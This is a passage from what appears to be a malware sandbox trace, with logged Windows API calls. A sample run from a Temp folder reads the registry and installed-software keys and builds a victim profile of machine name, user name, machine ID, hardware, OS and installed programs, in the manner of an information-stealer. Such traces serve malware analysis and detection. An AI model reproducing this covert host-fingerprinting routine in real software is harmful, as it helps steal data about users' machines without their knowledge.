Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016" [0175.911] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.911] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 " [0175.911] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001" [0175.912] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\n" [0175.912] RegCloseKey (hKey=0x354) returned 0x0 [0175.912] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x21, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0019-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.912] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0019-0409-0000-0000000FF1CE}") returned 90 [0175.912] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0019-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.912] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Publisher MUI (English) 2016", lpcbData=0x197fd4*=0x27) returned 0x0 [0175.912] lstrlenA (lpString="Microsoft Publisher MUI (English) 2016") returned 38 [0175.912] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Publisher MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016" [0175.912] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.912] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 